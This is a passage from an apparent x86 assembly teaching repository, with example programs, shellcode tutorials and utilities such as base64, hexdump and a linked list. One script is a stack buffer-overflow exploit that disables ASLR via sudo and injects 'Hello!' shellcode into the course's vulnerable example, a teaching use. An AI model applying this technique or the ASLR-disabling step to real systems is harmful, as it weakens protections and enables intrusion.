11 |   printf("input:\n");
12 |   get_input();
13 |   return 0;
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/examples/example-insecure_exploit.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | echo "Please ensure ASLR is turned off for this exploit example! echo 0 | sudo tee /proc/sys/kernel/randomize_va_space"
3 | perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x60\xf2\xff\xbf"' | ./example-18
4 | 


--------------------------------------------------------------------------------
/examples/example-libc.S:
--------------------------------------------------------------------------------
 1 | # Example of using libc in Assembly (example-libc.S)
 2 | .section .text
 3 | .global main
 4 | main:
 5 |   # %eax = time(NULL);
 6 |   pushl $0
 7 |   call time
 8 |   add $4, %esp
 9 | 
10 |   # *curtime = %eax
11 |   movl %eax, curtime
12 | 
13 |   # %eax = localtime(&curtime);
14 |   pushl $curtime
15 |   call localtime
16 |   add $4, %esp
17 | 
18 |   # %eax = asctime(%eax);
19 |   pushl %eax
20 |   call asctime
21 |   add $4, %esp
22 | 
23 |   # printf("%s\n", %eax);
24 |   pushl %eax
25 |   pushl $formatStr
26 |   call printf
27 |   add $8, %esp
28 | 
29 |   ret
30 | 
31 | .section .data
32 |   .comm curtime, 4
33 |   formatStr:  .ascii "%s\0"
34 | 
35 | 


--------------------------------------------------------------------------------
/examples/example-shellcode1.S:
--------------------------------------------------------------------------------
 1 | # Hello Shellcode Take 1 (example-shellcode1.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   # Clever way to get string address into %ecx
 6 |   jmp get_str_addr
 7 |   got_str_addr:
 8 |   popl %ecx
 9 | 
10 |   # write(1, "Hello!", 6);
11 |   movl $0x04, %eax
12 |   movl $0x01, %ebx
13 |   movl $6, %edx
14 |   int $0x80
15 | 
16 |   # exit(0);
17 |   movl $0x01, %eax
18 |   # %ebx already zero from above
19 |   int $0x80
20 | 
21 | get_str_addr:
22 |   call got_str_addr
23 |   .ascii "Hello!"
24 | 


--------------------------------------------------------------------------------
/examples/example-shellcode2.S:
--------------------------------------------------------------------------------
 1 | # Hello Shellcode Take 2 (example-shellcode2.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   # Clever way to get string address into %ecx
 6 |   jmp get_str_addr
 7 |   got_str_addr:
 8 |   popl %ecx
 9 | 
10 |   # write(1, "Hello!", 6);
11 |   xorl %eax, %eax
12 |   xorl %ebx, %ebx
13 |   xorl %edx, %edx
14 |   incl %ebx
15 |   addb $4, %al
16 |   addb $6, %dl
17 |   int $0x80
18 | 
19 |   # exit(0);
20 |   xorl %eax, %eax
21 |   incl %eax
22 |   # %ebx already zero from above
23 |   int $0x80
24 | 
25 | get_str_addr:
26 |   call got_str_addr
27 |   .ascii "Hello!"
28 | 


--------------------------------------------------------------------------------
/examples/example-stack.S:
--------------------------------------------------------------------------------
 1 | # Example of Stack Usage (example-stack.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   # Stack is now
 6 |   # |    ...     |   <-- %esp = 0x8xxxxxxx
 7 | 
 8 |   movl $0x05, %eax    # Load 0x00000005 into %eax
 9 | 
10 |   pushl %eax          # Push dword 0x00000005 onto the stack
11 |   incl %eax           # %eax += 1
12 |   pushl %eax          # Push dword 0x00000006 onto the stack
13 | 
14 |   pushl $0xdeadbeef   # Push dword 0xdeadbeef onto the stack
15 | 
16 |   # Stack is now
17 |   # |    ...     |
18 |   # | 0x00000005 |
19 |   # | 0x00000006 |
20 |   # | 0xdeadbeef |   <-- %esp = 0x8xxxxxxx
21 | 
22 |   popl %ebx           # Pop dword off of the stack,
23 |                       # %ebx = 0xdeadbeef now
24 | 
25 |   # Stack is now
26 |   # |    ...     |
27 |   # | 0x00000005 |
28 |   # | 0x00000006 |  <-- %esp = 0x8xxxxxxx
29 |   # | 0xdeadbeef |
30 | 
31 |   addl $4, %esp       # Deallocate 4 bytes off of the stack
32 | 
33 |   # Stack is now
34 |   # |    ...     |
35 |   # | 0x00000005 |  <-- %esp = 0x8xxxxxxx
36 |   # | 0x00000006 |
37 |   # | 0xdeadbeef |
38 | 
39 |   movl $0xaaaaaaaa, (%esp)  # Write 0xaaaaaaaa to the stack
40 | 
41 |   # Stack is now
42 |   # |    ...     |
43 |   # | 0xaaaaaaaa |  <-- %esp = 0x8xxxxxxx
44 |   # | 0x00000006 |
45 |   # | 0xdeadbeef |
46 | 
47 | 


--------------------------------------------------------------------------------
/examples/example-static-alloc.S:
--------------------------------------------------------------------------------
 1 | # Example of Static Allocation (example-static-alloc.S)
 2 | # Put some instructions in .text
 3 | .section .text
 4 | .global _start
 5 | _start:
 6 |   nop
 7 |   nop
 8 |   nop
 9 |   nop
10 | 
11 | # Put a string in .rodata
12 | .section .rodata
13 |   anotherStr:   .ascii "Another string\n\0"
14 | 
15 | # Put some magic bytes in .data
16 | .section .data
17 |   magicByte1:   .byte 0xaa
18 |   magicBytes2:  .byte 0x55, 0x10
19 |   magicDWord:   .long 0xdeadbeef
20 |   magicStr:     .ascii "String!\0"
21 | 
22 | # Reserve 1024 uninitialized bytes in .bss
23 | .section .bss
24 |   .comm Buffer, 1024
25 | 
26 | 


--------------------------------------------------------------------------------
/examples/example-string1.S:
--------------------------------------------------------------------------------
 1 | # Example 1 of String Instructions (example-string1.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   cld               # Clear DF, we want to post-increment
 6 | 
 7 |   # Load str1 with 8 of 0xff
 8 |   movl $str1, %edi  # Set up our string destination pointer
 9 | 
10 |   # Load the first four a byte at a time
11 |   movb $0xFF, %al
12 |   stosb             # *(%edi++) = %al
13 |   stosb             # *(%edi++) = %al
14 |   stosb             # *(%edi++) = %al
15 |   stosb             # *(%edi++) = %al
16 | 
17 |   # Load the last four with a single dword
18 |   movl $0xFFFFFFFF, %eax
19 |   stosl             # *(%edi) = %eax, %esi += 4
20 | 
21 |   # Copy str1 to str2
22 |   movl $str1, %esi  # str1 in the source
23 |   movl $str2, %edi  # str2 in the destination
24 |   # Two dword moves copies all 8 bytes
25 |   movsl
26 |   movsl
27 |   # Done!
28 | 
29 | .section .bss
30 |   .comm str1, 8
31 |   .comm str2, 8
32 | 
33 | 


--------------------------------------------------------------------------------
/examples/example-string2.S:
--------------------------------------------------------------------------------
 1 | # Example 2 of String Instructions (example-string2.S)
 2 | .section .text
 3 | .global main
 4 | main:
 5 |   # memset(str, 'A', 48);
 6 |   pushl $48
 7 |   pushl $'A
 8 |   pushl $str
 9 |   call asm_memset
10 |   addl $12, %esp
11 | 
12 |   # str[48] = '\n'; str[49] = '\0';
13 |   movb $'\n', str+48
14 |   movb $0, str+49
15 | 
16 |   # printf(str);
17 |   pushl $str
18 |   call printf
19 |   addl $4, %esp
20 | 
21 |   ret
22 | 
23 | # void *memset(void *s, int c, size_t n);
24 | asm_memset:
25 |   pushl %edi
26 |   pushl %ebp
27 |   movl %esp, %ebp
28 | 
29 |   movl 12(%ebp), %edi    # %eid = s
30 |   movl 16(%ebp), %eax    # %eax = c
31 |   movl 20(%ebp), %ecx    # %ecx = n
32 | 
33 |   rep stosb
34 | 
35 |   movl 12(%ebp), %eax    # %eax = s
36 | 
37 |   movl %ebp, %esp
38 |   popl %ebp
39 |   popl %edi
40 |   ret
41 | 
42 | .section .bss
43 |   .comm str, 50
44 | 
45 | 


--------------------------------------------------------------------------------
/examples/example-strlen.c:
--------------------------------------------------------------------------------
 1 | /* Reasonable strlen versus glibc i386 strlen example (example-1.c) */
 2 | #include <stdio.h>
 3 | 
 4 | size_t ex_strlen(const char *s) {
 5 | 	size_t i;
 6 | 	for (i = 0; *s != '\0'; i++)
 7 | 		s++;
 8 | 	return i;
 9 | }
10 | 
11 | /* From glibc/sysdeps/i386/strlen.c
12 |  * http://sourceware.org/git/?p=glibc.git;a=blob;f=sysdeps/i386/strlen.c
13 |  * Licensed: GNU Lesser General Public License */
14 | size_t
15 | glibc_strlen (const char *str)
16 | {
17 |   int cnt;
18 | 
19 |   asm("cld\n"                   /* Search forward.  */
20 |       /* Some old versions of gas need `repne' instead of `repnz'.  */
21 |       "repnz\n"                 /* Look for a zero byte.  */
22 |       "scasb" /* %0, %1, %3 */ :
23 |       "=c" (cnt) : "D" (str), "0" (-1), "a" (0));
24 | 
25 |   return -2 - cnt;
26 | }
27 | 
28 | int main(void) {
29 | 	return 0;
30 | }
31 | 
32 | 


--------------------------------------------------------------------------------
/examples/example-syscall.S:
--------------------------------------------------------------------------------
 1 | # Example of System Calls (example-syscall.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   # syscall open("foo", O_CREAT | O_WRONLY, 0644);
 6 |   movl $0x05, %eax
 7 |   movl $filename, %ebx
 8 |   movl $0x41, %ecx
 9 |   movl $0644, %edx
10 |   int $0x80
11 | 
12 |   # fd in %eax from open(), move it to %ebx for write()
13 |   movl %eax, %ebx
14 | 
15 |   # syscall write(fd, message, messageLen);
16 |   movl $0x04, %eax
17 |   # fd in %ebx from above
18 |   movl $message, %ecx
19 |   movl $messageLen, %edx
20 |   int $0x80
21 | 
22 |   # syscall close(fd);
23 |   movl $0x06, %eax
24 |   # fd still in %ebx
25 |   int $0x80
26 | 
27 |   # syscall exit(0);
28 |   movl $0x01, %eax
29 |   movl $0x0, %ebx
30 |   int $0x80
31 | 
32 | .section .data
33 |   filename:   .ascii "foo\0"
34 |   message:    .ascii "Hello World!\n"
35 |   .equ messageLen, . - message
36 | 
37 | 


--------------------------------------------------------------------------------
/examples/extra/Makefile:
--------------------------------------------------------------------------------
 1 | EXAMPLES = hexdump base64 line_counter
 2 | 
 3 | all:
 4 | # These C examples should be compiled & linked with gcc
 5 | # These examples should be linked with ld
 6 | 	as --32 -march=i686 hexdump.S -o hexdump.o && ld -m elf_i386 hexdump.o -o hexdump && objdump -D hexdump > hexdump.objdump
 7 | # These examples should be linked with gcc/libc
 8 | 	as --32 -march=i686 base64.S -o base64.o && gcc -m32 base64.o -o base64 && objdump -D base64 > base64.objdump
 9 | 	as --32 -march=i686 line_counter.S -o line_counter.o && gcc -m32 line_counter.o -o line_counter && objdump -D line_counter > line_counter.objdump
10 | # These examples should be assembled with nasm and linked with ld
11 | 
12 | clean:
13 | 	rm -f $(EXAMPLES)
14 | 	rm -f $(addsuffix .o, $(EXAMPLES))
15 | 	rm -f $(addsuffix .objdump, $(EXAMPLES))
16 | 


--------------------------------------------------------------------------------
/examples/extra/base64.S:
--------------------------------------------------------------------------------
  1 | # Accompanying slide
  2 | # \begin{frame}[fragile,t]
  3 | # \frametitle{Base-64 Representation of Binary Data}
  4 | # \begin{itemize}
  5 | #   \item Some ASCII-based communication channels do not handle binary data well (email, http, etc.).
  6 | #   \item Base-64 encoding expresses binary data with a set of 64 printable ASCII characters.
  7 | #   \item Encoding Scheme
  8 | #   \begin{itemize}
  9 | #     \item Combine three input bytes into a 24-bit quantity \\
 10 | #     {\ttfamily 0xFF 0xDE 0x02 =} \\ {\ttfamily 0b11111111\_11011110\_00000010}
 11 | #     \item Split the 24-bits into four 6-bit quantities \\
 12 | #     {\ttfamily 0b111111\_111101\_111000\_000010} \\
 13 | #     \item Look up each 6-bit quantity in the 64 ASCII character table
 14 | #     {\ttfamily b64table[0b111111], b64table[0b111101], b64table[0b111000], b64table[0b000010]} \\
 15 | #     \item Base-64 encoding of {\ttfamily 0xFF 0xDE 0x02} is {\ttfamily '/' '9' '4' 'c'}
 16 | #   \end{itemize}
 17 | #   \item Rules to pad input sequences that are not multiples of 3 bytes exist
 18 | # \end{itemize}
 19 | # \end{frame}
 20 | 
 21 | # Base-64 Encoder (base64.S)
 22 | .section .text
 23 | 
 24 | .global main
 25 | main:
 26 |   movl $plainData, %esi     # Pointer to plainData
 27 |   movl $encodedData, %edi   # Pointer to encodedData
 28 |   movl $b64table, %ebp      # Pointer to b64Table
 29 | 
 30 |   movl $0, %ecx             # Clear our counter %ecx
 31 |   movl plainDataLen, %edx   # Length of plain data in %edx
 32 | 
 33 |   b64_encode_loop:
 34 |     movb (%esi, %ecx, 1), %al   # Fetch byte 1 of 3
 35 |     incl %ecx
 36 |     shl $16, %eax               # Left shift the byte into place
 37 |     movb (%esi, %ecx, 1), %ah   # Fetch byte 2 of 3
 38 |     incl %ecx
 39 |     movb (%esi, %ecx, 1), %al   # Fetch byte 3 of 3
 40 |     incl %ecx
 41 | 
 42 |     # %eax contains 24-bits of input bytes
 43 |     # arranges as | x | 2 | 1 | 0 |
 44 | 
 45 |     movl %eax, %ebx     # Save a copy of %eax
 46 | 
 47 |     # Look up base-64 character 1
 48 |     shr $18, %eax               # Shift top 6-bits to the bottom
 49 |     andl $0x3F, %eax            # Mask them off
 50 |     movb (%ebp, %eax, 1), %al   # Look up the character from b64table
 51 |     movb %al, (%edi)            # Write character to encodeString
 52 |     incl %edi
 53 |     movl %ebx, %eax             # Restore %eax
 54 | 
 55 |     # Look up base-64 character 2
 56 |     shr $12, %eax               # Shift next 6-bits to the bottom
 57 |     andl $0x3F, %eax            # Mask them off
 58 |     movb (%ebp, %eax, 1), %al   # Look up the character from b64table
 59 |     movb %al, (%edi)            # Write character to encodeString
 60 |     incl %edi
 61 |     movl %ebx, %eax             # Restore %eax
 62 | 
 63 |     # Look up base-64 character 3
 64 |     shr $6, %eax                # Shift next 6-bits to the bottom
 65 |     andl $0x3F, %eax            # Mask them off
 66 |     movb (%ebp, %eax, 1), %al   # Look up the character from b64table
 67 |     movb %al, (%edi)            # Write character to encodeString
 68 |     incl %edi
 69 |     movl %ebx, %eax             # Restore %eax
 70 | 
 71 |     # Look up base-64 character 4
 72 |     andl $0x3F, %eax            # Mask off the last 6-bits
 73 |     movb (%ebp, %eax, 1), %al   # Look up the character from b64table
 74 |     movb %al, (%edi)            # Write character to encodeString
 75 |     incl %edi
 76 | 
 77 |     # Loop until we've processed all input bytes
 78 |     cmpl %edx, %ecx
 79 |     jl b64_encode_loop
 80 | 
 81 |   # Write a null-terminating byte to the encoded string
 82 |   movb $0, %al
 83 |   movb %al, (%edi)
 84 | 
 85 |   # Print the encoded string
 86 |   pushl $encodedData
 87 |   pushl $plainData
 88 |   pushl $formatStr
 89 |   call printf
 90 |   addl $12, %esp
 91 | 
 92 |   ret
 93 | 
 94 | .section .rodata
 95 |   # base-64 encoding look up table
 96 |   b64table:
 97 |   .byte 'A,'B,'C,'D,'E,'F,'G,'H
 98 |   .byte 'I,'J,'K,'L,'M,'N,'O,'P
 99 |   .byte 'Q,'R,'S,'T,'U,'V,'W,'X
100 |   .byte 'Y,'Z,'a,'b,'c,'d,'e,'f
101 |   .byte 'g,'h,'i,'j,'k,'l,'m,'n
102 |   .byte 'o,'p,'q,'r,'s,'t,'u,'v
103 |   .byte 'w,'x,'y,'z,'0,'1,'2,'3
104 |   .byte '4,'5,'6,'7,'8,'9,'+,'/
105 | 
106 |   formatStr:
107 |   .ascii "Plain data: %s\nEncoded data: %s\n\0"
108 | 
109 | .section .bss
110 |   # base-64 encoded string storage
111 |   .comm encodedData, 1024
112 | 
113 | .section .data
114 |   # input data (multiple of 3 bytes for the purpose of this example)
115 |   plainData:      .ascii "Hello World!\0"
116 |   plainDataLen:   .long 12
117 | 


--------------------------------------------------------------------------------
/examples/extra/hexdump.S:
--------------------------------------------------------------------------------
  1 | # Simple Hexdump (hexdump.S)
  2 | .section .text
  3 | .global _start
  4 | _start:
  5 |   pushl %ebp
  6 |   movl %esp, %ebp
  7 | 
  8 |   # Allocate int fd; char buff[16]; on stack
  9 |   subl $20, %esp
 10 | 
 11 |   # Check if argc != 2
 12 |   cmpl $2, 4(%ebp)
 13 |   jne print_usage
 14 | 
 15 |   # syscall open(argv[1], O_RDONLY);
 16 |   movl $0x05, %eax
 17 |   movl 12(%ebp), %ebx
 18 |   movl $0x00, %ecx
 19 |   int $0x80
 20 | 
 21 |   # Check if fd < 0
 22 |   test %eax, %eax
 23 |   jl exit
 24 | 
 25 |   # Copy %eax to fd local variable
 26 |   movl %eax, -4(%ebp)
 27 | 
 28 |   read_loop:
 29 |     # syscall read(fd, buff, 16);
 30 |     movl $0x03, %eax
 31 |     movl -4(%ebp), %ebx   # fd
 32 |     leal -20(%ebp), %ecx  # address %ebp-20, our buff[16]
 33 |     movl $16, %edx
 34 |     int $0x80
 35 |     # Check for error on read
 36 |     cmpl $0, %eax
 37 |     jle cleanup
 38 | 
 39 |     # %esi = index, %edi = count
 40 |     movl $0, %esi
 41 |     movl %eax, %edi
 42 | 
 43 |     byte_loop:
 44 |       # Fetch the byte from our buff
 45 |       movb -20(%ebp, %esi, 1), %al
 46 | 
 47 |       # Print out the byte as ASCII hex
 48 |       pushl %eax
 49 |       call putbyte
 50 |       addl $4, %esp
 51 | 
 52 |       # Print out a space
 53 |       pushl $' '
 54 |       call putchar
 55 |       addl $4, %esp
 56 | 
 57 |       # Loop byte_loop
 58 |       incl %esi
 59 |       decl %edi
 60 |       jnz byte_loop
 61 | 
 62 |     # Print out a newline
 63 |     pushl $'\n'
 64 |     call putchar
 65 |     addl $4, %esp
 66 | 
 67 |     # Loop read_loop
 68 |     jmp read_loop
 69 | 
 70 | print_usage:
 71 |   # syscall write(1, usageStr, usageStrLen);
 72 |   movl $4, %eax
 73 |   movl $1, %ebx
 74 |   movl $usageStr, %ecx
 75 |   movl $usageStrLen, %edx
 76 |   int $0x80
 77 |   jmp exit
 78 | 
 79 | cleanup:
 80 |   # syscall close(fd);
 81 |   movl $0x06, %eax
 82 |   movl -4(%ebp), %ebx
 83 |   int $0x80
 84 | 
 85 | exit:
 86 |   # syscall exit(0);
 87 |   movl $0x01, %eax
 88 |   movl $0x0, %ebx
 89 |   int $0x80
 90 | 
 91 | ########################################
 92 | 
 93 | putbyte:
 94 |   # Fetch argument
 95 |   movl 4(%esp), %eax
 96 |   # Isolate the top nibble 0xX0
 97 |   shrb $4, %al
 98 |   andl $0x0F, %eax
 99 |   # Convert to ASCII hex
100 |   movl $nibble2hex, %ecx
101 |   movb (%ecx, %eax, 1), %al
102 |   # Print out the nibble
103 |   pushl %eax
104 |   call putchar
105 |   addl $4, %esp
106 | 
107 |   # Fetch argument
108 |   movl 4(%esp), %eax
109 |   # Isolate the bottom nibble 0x0X
110 |   andl $0x0F, %eax
111 |   # Convert to ASCII hex
112 |   movl $nibble2hex, %ecx
113 |   movb (%ecx, %eax, 1), %al
114 |   # Print out the nibble
115 |   pushl %eax
116 |   call putchar
117 |   addl $4, %esp
118 |   ret
119 | 
120 | putchar:
121 |   # Save %ebx
122 |   pushl %ebx
123 |   # syscall write(1, c, 1);
124 |   movl $0x04, %eax
125 |   movl $1, %ebx
126 |   leal 8(%esp), %ecx
127 |   movl $1, %edx
128 |   int $0x80
129 |   # Restore %ebx
130 |   popl %ebx
131 |   ret
132 | 
133 | ########################################
134 | 
135 | .section .rodata
136 |   nibble2hex: .ascii "0123456789abcdef"
137 |   usageStr:   .ascii "./hexdump <file>\n"
138 |   .equ usageStrLen, . - usageStr
139 | 


--------------------------------------------------------------------------------
/examples/extra/line_counter.S:
--------------------------------------------------------------------------------
  1 | # File Line Counter (line_counter.S)
  2 | .section .text
  3 | .global main
  4 | 
  5 | # int main(int argc, char *argv[]) {
  6 | main:
  7 |   # Function prologue
  8 |   pushl %ebp
  9 |   movl %esp, %ebp
 10 | 
 11 |   # Allocate space for FILE *fp; unsigned int lc;
 12 |   subl $8, %esp
 13 | 
 14 |   # libc retaddr at %ebp+4
 15 |   # argc is at %ebp+8
 16 |   # **argv is at %ebp+12
 17 |   # *argv[0] is at *(%ebp+12)+0
 18 |   # *argv[1] is at *(%ebp+12)+4
 19 |   # FILE *fp is at %ebp-4
 20 |   # unsigned int lc at %ebp-8
 21 | 
 22 |   # if (argc != 2)
 23 |   cmpl $2, 8(%ebp)
 24 |   jne printUsage
 25 | 
 26 |   movl 12(%ebp), %eax   # Copy argv to %eax
 27 |   addl $4, %eax         # Add 4 to yield *argv[1]
 28 |   movl (%eax), %eax     # Dereference to yield argv[1]
 29 | 
 30 |   # fopen(argv[1], "r");
 31 |   pushl $openMode
 32 |   pushl %eax
 33 |   call fopen
 34 |   addl $8, %esp
 35 |   # fp = ...
 36 |   movl %eax, -4(%ebp)
 37 | 
 38 |   # if (fp == NULL)
 39 |   test %eax, %eax
 40 |   jz errorOpen
 41 | 
 42 |   # lc = 0;
 43 |   movl $0, -8(%ebp)
 44 | 
 45 |   read_loop:
 46 |     # %eax = fgetc(fp);
 47 |     pushl -4(%ebp)
 48 |     call fgetc
 49 |     addl $4, %esp
 50 | 
 51 |     # if (c == EOF) break;
 52 |     cmpl $-1, %eax
 53 |     je print_count
 54 |     # if (c != '\n') continue;
 55 |     cmpl $0x0A, %eax
 56 |     jne read_loop
 57 |     # lc += 1
 58 |     addl $1, -8(%ebp)
 59 |     jmp read_loop
 60 | 
 61 |   print_count:
 62 |     # printf("%d\n", lc);
 63 |     pushl -8(%ebp)
 64 |     pushl $countStr
 65 |     call printf
 66 |     addl $8, %esp
 67 |     # return 0;
 68 |     movl $0, %eax
 69 |     jmp finished
 70 | 
 71 |   printUsage:
 72 |     # printf("usage %s <file>\n", argv[0]);
 73 |     movl 12(%ebp), %eax
 74 |     pushl (%eax)
 75 |     pushl $usageStr
 76 |     call printf
 77 |     addl $8, %esp
 78 |     # return -1;
 79 |     movl $0, %eax
 80 |     notl %eax
 81 |     jmp finished
 82 | 
 83 |   errorOpen:
 84 |     # printf("error opening file!\n");
 85 |     pushl $errorOpenStr
 86 |     call printf
 87 |     addl $4, %esp
 88 |     # return -1;
 89 |     movl $0, %eax
 90 |     notl %eax
 91 |     jmp finished
 92 | 
 93 |   finished:
 94 |   movl %ebp, %esp
 95 |   popl %ebp
 96 |   ret
 97 | 
 98 | 
 99 | .section .data
100 |   openMode:     .ascii "r\0"
101 |   countStr:     .ascii "%d\n\0"
102 |   usageStr:     .ascii "usage: %s <file>\n\0"
103 |   errorOpenStr: .ascii "error opening file!\n\0"
104 | 


--------------------------------------------------------------------------------
/examples/extra/line_counter_c.c:
--------------------------------------------------------------------------------
 1 | /* File Line Counter in C (line_counter_c.c) */
 2 | #include <stdio.h>
 3 | 
 4 | int main(int argc, char *argv[]) {
 5 |   FILE *fp;
 6 |   char c;
 7 |   unsigned int lc;
 8 | 
 9 |   if (argc != 2) {
10 |     printf("usage: %s <file>\n", argv[0]);
11 |     return -1;
12 |   }
13 | 
14 |   fp = fopen(argv[1], "r");
15 |   if (fp == NULL) {
16 |     printf("error opening file!\n");
17 |     return -1;
18 |   }
19 | 
20 |   lc = 0;
21 |   while ((c = fgetc(fp)) != EOF) {
22 |     if (c == '\n')
23 |       lc++;
24 |   }
25 | 
26 |   printf("%d\n", lc);
27 | 
28 |   fclose(fp);
29 |   return 0;
30 | }
31 | 


--------------------------------------------------------------------------------
/examples/fibonacci.S:
--------------------------------------------------------------------------------
 1 | # Iterative Fibonacci Sequence Program (example-4.S)
 2 | .section .text
 3 | .global main
 4 | main:
 5 |   movl $0, %ecx     # f_n-2 = 0
 6 |   movl $1, %ebx     # f_n-1 = 1
 7 |   movl $1, %eax     # f_n   = 1
 8 |   movl $12, %edi    # Number of integers to compute
 9 | 
10 |   fib_loop:
11 |     # Print %eax
12 |     call myprint
13 | 
14 |     movl %ebx, %ecx   # f_n-1 -> f_n-2
15 |     movl %eax, %ebx   # f_n   -> f_n-1
16 |     addl %ecx, %eax   # New f_n = Old f_n + f_n-2
17 | 
18 |     # Decrement %edi
19 |     decl %edi
20 |     jnz fib_loop
21 | 
22 |   ret
23 | 
24 | myprint:
25 |   # Save %ecx, %ebx, %eax
26 |   # Pass formatStr (and %eax)
27 |   pushl %ecx
28 |   pushl %ebx
29 |   pushl %eax
30 |   pushl $formatStr
31 |   call printf
32 |   addl $4, %esp
33 |   # Restore %eax, %ebx, %ecx
34 |   popl %eax
35 |   popl %ebx
36 |   popl %ecx
37 |   ret
38 | 
39 | .section .data
40 |   formatStr: .ascii "%d\n\0" # printf() format string
41 | 


--------------------------------------------------------------------------------
/examples/linked_list.S:
--------------------------------------------------------------------------------
  1 | # Linked List (linked_list.S)
  2 | .section .text
  3 | .global main
  4 | 
  5 | # struct list { int data; struct list *next; };
  6 | #
  7 | #  [ int data; ][ list *next; ]   8 bytes total
  8 | #   \ 4 bytes /  \  4 bytes  /
  9 | 
 10 | # list *list_alloc(int data);
 11 | list_alloc:
 12 |   pushl $8            # %eax = malloc(8);
 13 |   call malloc
 14 |   addl $4, %esp
 15 | 
 16 |   testl %eax, %eax    # if (%eax == NULL)
 17 |   jz fatal            #   goto fatal;
 18 | 
 19 |   movl 4(%esp), %ecx
 20 |   movl %ecx, (%eax)   # %eax->data = data
 21 |   movl $0, 4(%eax)    # %eax->next = 0
 22 |   ret
 23 | 
 24 |   # Dirty error handling
 25 |   fatal:
 26 |       jmp fatal
 27 | 
 28 | # void list_add(list *head, int data);
 29 | list_add:
 30 |   push %ebp
 31 |   mov %esp, %ebp
 32 |   subl $4, %esp           # list *n;
 33 | 
 34 |   pushl 12(%ebp)          # %eax = list_alloc(data);
 35 |   call list_alloc
 36 |   addl $4, %esp
 37 | 
 38 |   mov %eax, -4(%ebp)      # n = %eax;
 39 | 
 40 |   mov 8(%ebp), %eax       # %eax = head
 41 | 
 42 |   traverse_add:
 43 |     cmpl $0, 4(%eax)      # if (%eax->next == NULL)
 44 |     jz at_end_add         #  goto at_end_add;
 45 |     movl 4(%eax), %eax    # %eax = %eax->next
 46 |     jmp traverse_add      # Loop
 47 | 
 48 |   at_end_add:
 49 |   movl -4(%ebp), %ecx     # %ecx = n
 50 |   movl %ecx, 4(%eax)      # %eax->next = %ecx
 51 | 
 52 |   mov %ebp, %esp
 53 |   pop %ebp
 54 |   ret
 55 | 
 56 | # void list_dump(list *head);
 57 | list_dump:
 58 |     push %ebp
 59 |     mov %esp, %ebp
 60 | 
 61 |     pushl %ebx              # Save %ebx
 62 |     movl 8(%ebp), %ebx      # %ebx = head
 63 | 
 64 |     traverse_dump:
 65 |         testl %ebx, %ebx    # if (%ebx == NULL)
 66 |         jz at_end_dump      #  goto at_end_dump;
 67 | 
 68 |         movl (%ebx), %ecx   # %ecx = %ebx->data
 69 |         pushl %ecx          # printf("%d\n", %ecx)
 70 |         pushl $fmtStr
 71 |         call printf
 72 |         addl $8, %esp
 73 | 
 74 |         movl 4(%ebx), %ebx  # %ebx = %ebx->next
 75 |         jmp traverse_dump   # Loop
 76 | 
 77 |     at_end_dump:
 78 |     pop %ebx                # Restore %ebx
 79 |     mov %ebp, %esp
 80 |     pop %ebp
 81 |     ret
 82 | 
 83 | 
 84 | 
 85 | main:
 86 |     pushl $86           # %eax = list_alloc(86);
 87 |     call list_alloc
 88 |     addl $4, %esp
 89 |     movl %eax, head     # head = %eax
 90 | 
 91 |     pushl $75           # list_add(head, 75);
 92 |     pushl head
 93 |     call list_add
 94 |     addl $8, %esp
 95 | 
 96 |     pushl $309          # list_add(head, 309);
 97 |     pushl head
 98 |     call list_add
 99 |     addl $8, %esp
100 | 
101 |     pushl head          # list_dump(head);
102 |     call list_dump
103 |     addl $4, %esp
104 | 
105 |     movl $0, %eax       # Return 0
106 |     ret
107 | 
108 | .section .data
109 |   head:     .long 0
110 |   fmtStr:   .ascii "%d\n\0"
111 | 


--------------------------------------------------------------------------------
/examples/morse_encoder.S:
--------------------------------------------------------------------------------
 1 | # Morse Word Encoder (morse_encoder.S)
 2 | .section .text
 3 | .global main
 4 | main:
 5 |   movl $inputWord, %esi       # Pointer to input word
 6 |   movl $outputMorse, %edi     # Pointer to output morse
 7 |   movl $0, %eax               # Clear %eax
 8 | 
 9 |   encode_loop:
10 |     movb (%esi), %al          # Read the next byte of input to %al
11 |     incl %esi                 # Increment input word pointer
12 | 
13 |     testb %al, %al            # If we encounter a null byte
14 |     jz finished               #   jump to finished
15 | 
16 |     subb $'A, %al             # Adjust %al to be relative to 'A'
17 | 
18 |     movl $MorseTable, %ecx    # Initialize %ecx morse table pointer
19 |     lookup:
20 |                                   # Read the next code character into %bl
21 |       movb (%ecx, %eax, 8), %bl   # %bl = *(%ecx + 8*%eax)
22 | 
23 |       cmpb $' , %bl               # If we encounter a space
24 |       je lookup_done              #   break out of the loop
25 | 
26 |       movb %bl, (%edi)            # Copy the code char. to our output morse
27 |       incl %edi                   # Increment output morse pointer
28 | 
29 |       incl %ecx                   # Incerment our table pointer
30 |       jmp lookup                  # Loop
31 | 
32 |   lookup_done:
33 |     movb $' , (%edi)          # Copy a space to the output morse
34 |     incl %edi                 # Increment output morse pointer
35 |     movb $' , (%edi)          # ...
36 |     incl %edi                 # ...
37 |     movb $' , (%edi)          # ...
38 |     incl %edi                 # ...
39 | 
40 |     jmp encode_loop
41 | 
42 |   finished:
43 |     movb $0x00, (%edi)        # Append a null byte to the output morse
44 |     incl %edi                 # Increment output morse pointer
45 | 
46 |     pushl $outputMorse        # Call puts(outputMorse);
47 |     call puts
48 |     addl $4, %esp
49 | 
50 |     movl $0, %eax             # Return 0
51 |     ret
52 | 
53 | .section .rodata
54 |   # Morse code lookup table
55 |   MorseTable:
56 |   .ascii ".-      ", "-...    ", "-.-.    ", "-..     " # A, B, C, D
57 |   .ascii ".       ", "..-.    ", "--.     ", "....    " # E, F, G, H
58 |   .ascii "..      ", ".---    ", "-.-     ", ".-..    " # I, J, K, L
59 |   .ascii "--      ", "-.      ", "---     ", ".--.    " # M, N, O, P
60 |   .ascii "--.-    ", ".-.     ", "...     ", "-       " # Q, R, S, T
61 |   .ascii "..-     ", "...-    ", ".--     ", "-..-    " # U, V, W, X
